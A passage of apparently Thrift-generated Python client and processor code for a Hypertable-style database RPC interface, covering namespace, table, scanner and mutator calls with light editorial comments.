    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = flush_mutator_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def exists_namespace(self, ns):
    """Return True when the namespace exists, False otherwise.

    @param ns - namespace name
    """
    self.send_exists_namespace(ns)
    return self.recv_exists_namespace()
def send_exists_namespace(self, ns):
    # Serialize an exists_namespace CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('exists_namespace', TMessageType.CALL, self._seqid)
    args = exists_namespace_args()
    args.ns = ns
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_exists_namespace(self):
    """Read the exists_namespace reply and return the boolean result."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = exists_namespace_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "exists_namespace failed: unknown result")
def exists_table(self, ns, name):
    """Return True when the table exists in the namespace, False otherwise.

    @param ns - namespace id
    @param name - table name
    """
    self.send_exists_table(ns, name)
    return self.recv_exists_table()
def send_exists_table(self, ns, name):
    # Serialize an exists_table CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('exists_table', TMessageType.CALL, self._seqid)
    args = exists_table_args()
    args.ns = ns
    args.name = name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_exists_table(self):
    """Read the exists_table reply and return the boolean result."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = exists_table_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "exists_table failed: unknown result")
def get_table_id(self, ns, table_name):
    """Return the id string of a table.

    @param ns - namespace id
    @param table_name - table name
    """
    self.send_get_table_id(ns, table_name)
    return self.recv_get_table_id()
def send_get_table_id(self, ns, table_name):
    # Serialize a get_table_id CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_table_id', TMessageType.CALL, self._seqid)
    args = get_table_id_args()
    args.ns = ns
    args.table_name = table_name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_table_id(self):
    """Read the get_table_id reply and return the table id string."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_table_id_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_table_id failed: unknown result")
def get_schema_str(self, ns, table_name):
    """Return a table's schema as an XML string usable with create_table.

    @param ns - namespace id
    @param table_name - table name
    """
    self.send_get_schema_str(ns, table_name)
    return self.recv_get_schema_str()
def send_get_schema_str(self, ns, table_name):
    # Serialize a get_schema_str CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_schema_str', TMessageType.CALL, self._seqid)
    args = get_schema_str_args()
    args.ns = ns
    args.table_name = table_name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_schema_str(self):
    """Read the get_schema_str reply and return the schema string."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_schema_str_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_schema_str failed: unknown result")
def get_schema(self, ns, table_name):
    """Return a schema object describing the table.

    @param ns - namespace id
    @param table_name - table name
    """
    self.send_get_schema(ns, table_name)
    return self.recv_get_schema()
def send_get_schema(self, ns, table_name):
    # Serialize a get_schema CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_schema', TMessageType.CALL, self._seqid)
    args = get_schema_args()
    args.ns = ns
    args.table_name = table_name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_schema(self):
    """Read the get_schema reply and return the schema object."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_schema_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_schema failed: unknown result")
def get_tables(self, ns):
    """Return the list of table names in a namespace.

    @param ns - namespace id
    """
    self.send_get_tables(ns)
    return self.recv_get_tables()
def send_get_tables(self, ns):
    # Serialize a get_tables CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_tables', TMessageType.CALL, self._seqid)
    args = get_tables_args()
    args.ns = ns
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_tables(self):
    """Read the get_tables reply and return the list of table names."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_tables_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_tables failed: unknown result")
def get_listing(self, ns):
    """Return the namespaces and table names contained in a namespace.

    @param ns - namespace
    """
    self.send_get_listing(ns)
    return self.recv_get_listing()
def send_get_listing(self, ns):
    # Serialize a get_listing CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_listing', TMessageType.CALL, self._seqid)
    args = get_listing_args()
    args.ns = ns
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_listing(self):
    """Read the get_listing reply and return the listing."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_listing_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_listing failed: unknown result")
def get_table_splits(self, ns, table_name):
    """Return the list of splits for a table.

    @param ns - namespace id
    @param table_name - table name
    """
    self.send_get_table_splits(ns, table_name)
    return self.recv_get_table_splits()
def send_get_table_splits(self, ns, table_name):
    # Serialize a get_table_splits CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('get_table_splits', TMessageType.CALL, self._seqid)
    args = get_table_splits_args()
    args.ns = ns
    args.table_name = table_name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_get_table_splits(self):
    """Read the get_table_splits reply and return the splits."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = get_table_splits_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_table_splits failed: unknown result")
def drop_namespace(self, ns, if_exists):
    """Drop a namespace.

    @param ns - namespace name
    @param if_exists - when true, do not error if the namespace is absent
    """
    self.send_drop_namespace(ns, if_exists)
    self.recv_drop_namespace()
def send_drop_namespace(self, ns, if_exists):
    # Serialize a drop_namespace CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('drop_namespace', TMessageType.CALL, self._seqid)
    args = drop_namespace_args()
    args.ns = ns
    args.if_exists = if_exists
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_drop_namespace(self):
    """Read the drop_namespace reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = drop_namespace_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def rename_table(self, ns, name, new_name):
    """Rename a table.

    @param ns - namespace id
    @param name - current table name
    @param new_name - new table name
    """
    self.send_rename_table(ns, name, new_name)
    self.recv_rename_table()
def send_rename_table(self, ns, name, new_name):
    # Serialize a rename_table CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('rename_table', TMessageType.CALL, self._seqid)
    args = rename_table_args()
    args.ns = ns
    args.name = name
    args.new_name = new_name
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_rename_table(self):
    """Read the rename_table reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = rename_table_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def drop_table(self, ns, name, if_exists):
    """Drop a table.

    @param ns - namespace id
    @param name - table name
    @param if_exists - when true, do not error if the table is absent
    """
    self.send_drop_table(ns, name, if_exists)
    self.recv_drop_table()
def send_drop_table(self, ns, name, if_exists):
    # Serialize a drop_table CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('drop_table', TMessageType.CALL, self._seqid)
    args = drop_table_args()
    args.ns = ns
    args.name = name
    args.if_exists = if_exists
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_drop_table(self):
    """Read the drop_table reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = drop_table_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
class Processor(Iface, TProcessor):
def __init__(self, handler):
    """Build the dispatch table mapping RPC names to process_* methods."""
    self._handler = handler
    self._processMap = {}
    # getattr(Processor, 'process_' + name) yields the same method object
    # as the explicit attribute references this loop replaces.
    for _rpc in (
        "create_namespace", "create_table", "open_namespace",
        "close_namespace", "open_scanner", "close_scanner",
        "next_cells", "next_cells_as_arrays", "next_cells_serialized",
        "next_row", "next_row_as_arrays", "next_row_serialized",
        "get_row", "get_row_as_arrays", "get_row_serialized",
        "get_cell", "get_cells", "get_cells_as_arrays",
        "get_cells_serialized", "refresh_shared_mutator",
        "offer_cells", "offer_cells_as_arrays", "offer_cell",
        "offer_cell_as_array", "open_mutator", "close_mutator",
        "set_cell", "set_cell_as_array", "set_cells",
        "set_cells_as_arrays", "set_cells_serialized", "flush_mutator",
        "exists_namespace", "exists_table", "get_table_id",
        "get_schema_str", "get_schema", "get_tables", "get_listing",
        "get_table_splits", "drop_namespace", "rename_table",
        "drop_table",
    ):
        self._processMap[_rpc] = getattr(Processor, "process_" + _rpc)
def process(self, iprot, oprot):
    """Read one incoming message and dispatch it to the matching handler.

    Unknown method names are answered with an UNKNOWN_METHOD exception
    frame; known names are delegated through the process map.
    """
    # `mtype` instead of `type`: avoid shadowing the builtin.
    (name, mtype, seqid) = iprot.readMessageBegin()
    if name not in self._processMap:
        iprot.skip(TType.STRUCT)
        iprot.readMessageEnd()
        x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
        oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
        x.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
        return
    else:
        self._processMap[name](self, seqid, iprot, oprot)
    return True
def process_create_namespace(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and send a REPLY; a ClientException
    # raised by the handler is returned to the caller in result.e.
    args = create_namespace_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = create_namespace_result()
    try:
        self._handler.create_namespace(args.ns)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("create_namespace", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_create_table(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and send a REPLY; a ClientException
    # raised by the handler is returned to the caller in result.e.
    args = create_table_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = create_table_result()
    try:
        self._handler.create_table(args.ns, args.table_name, args.schema)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("create_table", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_open_namespace(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the handler's return
    # value in result.success (or a ClientException in result.e).
    args = open_namespace_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = open_namespace_result()
    try:
        result.success = self._handler.open_namespace(args.ns)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("open_namespace", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_close_namespace(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and send a REPLY; a ClientException
    # raised by the handler is returned to the caller in result.e.
    args = close_namespace_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = close_namespace_result()
    try:
        self._handler.close_namespace(args.ns)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("close_namespace", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_open_scanner(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the new scanner id
    # in result.success (or a ClientException in result.e).
    args = open_scanner_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = open_scanner_result()
    try:
        result.success = self._handler.open_scanner(args.ns, args.table_name, args.scan_spec, args.retry_table_not_found)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("open_scanner", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_close_scanner(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and send a REPLY; a ClientException
    # raised by the handler is returned to the caller in result.e.
    args = close_scanner_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = close_scanner_result()
    try:
        self._handler.close_scanner(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("close_scanner", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_cells(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the next batch of
    # cells in result.success (or a ClientException in result.e).
    args = next_cells_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_cells_result()
    try:
        result.success = self._handler.next_cells(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("next_cells", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_cells_as_arrays(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the next batch of
    # array-encoded cells in result.success (or a ClientException in result.e).
    args = next_cells_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_cells_as_arrays_result()
    try:
        result.success = self._handler.next_cells_as_arrays(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("next_cells_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_cells_serialized(self, seqid, iprot, oprot):
    # NOTE(review): unlike the sibling handlers this one has no
    # ClientException guard — presumably the IDL declares no throws
    # clause for next_cells_serialized; confirm against the .thrift file.
    args = next_cells_serialized_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_cells_serialized_result()
    result.success = self._handler.next_cells_serialized(args.scanner)
    oprot.writeMessageBegin("next_cells_serialized", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_row(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the next row's cells
    # in result.success (or a ClientException in result.e).
    args = next_row_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_row_result()
    try:
        result.success = self._handler.next_row(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("next_row", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_row_as_arrays(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the next row as
    # array-encoded cells in result.success (or a ClientException in result.e).
    args = next_row_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_row_as_arrays_result()
    try:
        result.success = self._handler.next_row_as_arrays(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("next_row_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_next_row_serialized(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the next row as a
    # serialized buffer in result.success (or a ClientException in result.e).
    args = next_row_serialized_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = next_row_serialized_result()
    try:
        result.success = self._handler.next_row_serialized(args.scanner)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("next_row_serialized", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_row(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the row's cells in
    # result.success (or a ClientException in result.e).
    args = get_row_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_row_result()
    try:
        result.success = self._handler.get_row(args.ns, args.table_name, args.row)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("get_row", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_row_as_arrays(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the row as
    # array-encoded cells in result.success (or a ClientException in result.e).
    args = get_row_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_row_as_arrays_result()
    try:
        result.success = self._handler.get_row_as_arrays(args.ns, args.name, args.row)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("get_row_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_row_serialized(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the row as a
    # serialized buffer in result.success (or a ClientException in result.e).
    args = get_row_serialized_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_row_serialized_result()
    try:
        result.success = self._handler.get_row_serialized(args.ns, args.table_name, args.row)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("get_row_serialized", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_cell(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the cell value in
    # result.success (or a ClientException in result.e).
    args = get_cell_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_cell_result()
    try:
        result.success = self._handler.get_cell(args.ns, args.table_name, args.row, args.column)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("get_cell", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_cells(self, seqid, iprot, oprot):
    # Decode args, invoke the handler, and reply with the matching cells
    # in result.success (or a ClientException in result.e).
    args = get_cells_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_cells_result()
    try:
        result.success = self._handler.get_cells(args.ns, args.table_name, args.scan_spec)
    except ClientException, e:
        result.e = e
    oprot.writeMessageBegin("get_cells", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_cells_as_arrays(self, seqid, iprot, oprot):
    """Decode get_cells_as_arrays args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_cells_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_cells_as_arrays_result()
    try:
        result.success = self._handler.get_cells_as_arrays(args.ns, args.name, args.scan_spec)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_cells_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_cells_serialized(self, seqid, iprot, oprot):
    """Decode get_cells_serialized args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_cells_serialized_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_cells_serialized_result()
    try:
        result.success = self._handler.get_cells_serialized(args.ns, args.name, args.scan_spec)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_cells_serialized", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_refresh_shared_mutator(self, seqid, iprot, oprot):
    """Decode refresh_shared_mutator args, invoke the void handler, and send
    the REPLY (ClientException is captured in result.e)."""
    args = refresh_shared_mutator_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = refresh_shared_mutator_result()
    try:
        self._handler.refresh_shared_mutator(args.ns, args.table_name, args.mutate_spec)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("refresh_shared_mutator", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_offer_cells(self, seqid, iprot, oprot):
    """Decode offer_cells args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = offer_cells_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = offer_cells_result()
    try:
        self._handler.offer_cells(args.ns, args.table_name, args.mutate_spec, args.cells)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("offer_cells", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_offer_cells_as_arrays(self, seqid, iprot, oprot):
    """Decode offer_cells_as_arrays args, invoke the void handler, and send
    the REPLY (ClientException is captured in result.e)."""
    args = offer_cells_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = offer_cells_as_arrays_result()
    try:
        self._handler.offer_cells_as_arrays(args.ns, args.table_name, args.mutate_spec, args.cells)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("offer_cells_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_offer_cell(self, seqid, iprot, oprot):
    """Decode offer_cell args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = offer_cell_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = offer_cell_result()
    try:
        self._handler.offer_cell(args.ns, args.table_name, args.mutate_spec, args.cell)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("offer_cell", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_offer_cell_as_array(self, seqid, iprot, oprot):
    """Decode offer_cell_as_array args, invoke the void handler, and send the
    REPLY (ClientException is captured in result.e)."""
    args = offer_cell_as_array_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = offer_cell_as_array_result()
    try:
        self._handler.offer_cell_as_array(args.ns, args.table_name, args.mutate_spec, args.cell)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("offer_cell_as_array", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_open_mutator(self, seqid, iprot, oprot):
    """Decode open_mutator args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = open_mutator_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = open_mutator_result()
    try:
        result.success = self._handler.open_mutator(args.ns, args.table_name, args.flags, args.flush_interval)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("open_mutator", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_close_mutator(self, seqid, iprot, oprot):
    """Decode close_mutator args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = close_mutator_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = close_mutator_result()
    try:
        self._handler.close_mutator(args.mutator, args.flush)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("close_mutator", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_set_cell(self, seqid, iprot, oprot):
    """Decode set_cell args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = set_cell_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = set_cell_result()
    try:
        self._handler.set_cell(args.mutator, args.cell)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("set_cell", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_set_cell_as_array(self, seqid, iprot, oprot):
    """Decode set_cell_as_array args, invoke the void handler, and send the
    REPLY (ClientException is captured in result.e)."""
    args = set_cell_as_array_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = set_cell_as_array_result()
    try:
        self._handler.set_cell_as_array(args.mutator, args.cell)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("set_cell_as_array", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_set_cells(self, seqid, iprot, oprot):
    """Decode set_cells args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = set_cells_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = set_cells_result()
    try:
        self._handler.set_cells(args.mutator, args.cells)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("set_cells", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_set_cells_as_arrays(self, seqid, iprot, oprot):
    """Decode set_cells_as_arrays args, invoke the void handler, and send the
    REPLY (ClientException is captured in result.e)."""
    args = set_cells_as_arrays_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = set_cells_as_arrays_result()
    try:
        self._handler.set_cells_as_arrays(args.mutator, args.cells)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("set_cells_as_arrays", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_set_cells_serialized(self, seqid, iprot, oprot):
    """Decode set_cells_serialized args, invoke the void handler, and send the
    REPLY (ClientException is captured in result.e)."""
    args = set_cells_serialized_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = set_cells_serialized_result()
    try:
        self._handler.set_cells_serialized(args.mutator, args.cells, args.flush)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("set_cells_serialized", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_flush_mutator(self, seqid, iprot, oprot):
    """Decode flush_mutator args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = flush_mutator_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = flush_mutator_result()
    try:
        self._handler.flush_mutator(args.mutator)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("flush_mutator", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_exists_namespace(self, seqid, iprot, oprot):
    """Decode exists_namespace args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = exists_namespace_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = exists_namespace_result()
    try:
        result.success = self._handler.exists_namespace(args.ns)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("exists_namespace", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_exists_table(self, seqid, iprot, oprot):
    """Decode exists_table args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = exists_table_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = exists_table_result()
    try:
        result.success = self._handler.exists_table(args.ns, args.name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("exists_table", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_table_id(self, seqid, iprot, oprot):
    """Decode get_table_id args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_table_id_args()
    args.read(iprot)
    iprot.readMessageEnd()
